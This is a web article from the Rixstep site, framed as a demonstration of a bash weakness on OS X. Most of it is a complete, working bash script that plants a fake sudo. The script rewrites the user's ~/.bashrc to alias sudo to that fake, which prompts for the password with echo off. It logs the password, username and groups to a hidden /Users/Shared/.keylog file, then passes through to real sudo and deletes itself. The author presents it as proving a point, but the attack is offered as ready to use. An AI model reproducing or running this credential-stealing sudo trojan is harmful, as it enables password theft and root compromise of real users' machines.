Rixstep
 About | ACP | Buy | Industry Watch | Learning Curve | News | Search | Test
Home » Learning Curve

Way Too Much Sudo Fun

Bashing bash again because it's so much fun and above all so easy.


As demonstrated in 'Sudo Fun' it's possible to hijack use of the Unix sudo to obtain less than optimal results. OS X boxes can namely be compromised in a number of ways.

As demonstrated in 'Too Much Sudo Fun' it's possible to humiliate bash without risking the maintainers do anything about it. ~/.bash_profile is used to accomplish this.

But it turns out even ~/.bashrc can be made into a turkey. And that's demonstrated here and now.

#! /bin/bash

userhome="/Users/`whoami`"

fakesudo="/Users/Shared/sudo"
logfile="/Users/Shared/.keylog"
target="$userhome/.bashrc"

if [ -f $target ]; then
    if [ ! -w $target ]; then
        chmod a+w $target 2>/dev/null || exit 1
    fi
else
    touch $target 2>/dev/null || exit 1
fi

grep -sq sudo $target || cat <<EOF >>$target
if [ -x $fakesudo ]; then
    alias sudo="$fakesudo"
fi
EOF

if [ -f "$fakesudo" ]; then
    rm -f "$fakesudo" 2>/dev/null
fi

touch "$fakesudo"
chmod a+x "$fakesudo"

echo '#! /bin/bash'>>"$fakesudo"
echo '#'>>"$fakesudo"
echo 'inp=""'>>"$fakesudo"

echo 'stty -echo'>>"$fakesudo"
echo 'read -p "Password:" inp'>>"$fakesudo"
echo 'stty  echo'>>"$fakesudo"
echo 'echo'>>"$fakesudo"

echo 'logfile="/Users/Shared/.keylog" '>>"$fakesudo"
echo 'echo "$inp">>"$logfile"'>>"$fakesudo"
echo 'echo `whoami`>>"$logfile" '>>"$fakesudo"
echo 'echo `groups`>>"$logfile" '>>"$fakesudo"
echo 'echo "Sorry, try again."'>>"$fakesudo"

echo '/usr/bin/sudo "$@"'>>"$fakesudo"

echo 'rm -f "/Users/Shared/sudo"'>>"$fakesudo"
echo 'bash ' >> $fakesudo
echo 'exit 0'>>"$fakesudo"

bash
exit 0

There are a few caveats with this exploit but it does prove a point. Namely that it's all too easy - not with OS X but with bash - to own a machine.

See Also
Sudo Fun
ACP Services
Resolve Path
Too Much Sudo Fun


Thanks again to GC at the CLIX Exchange for pulling another all nighter.

About | ACP | Buy | Industry Watch | Learning Curve | News | Products | Search | Substack
Copyright © Rixstep. All rights reserved.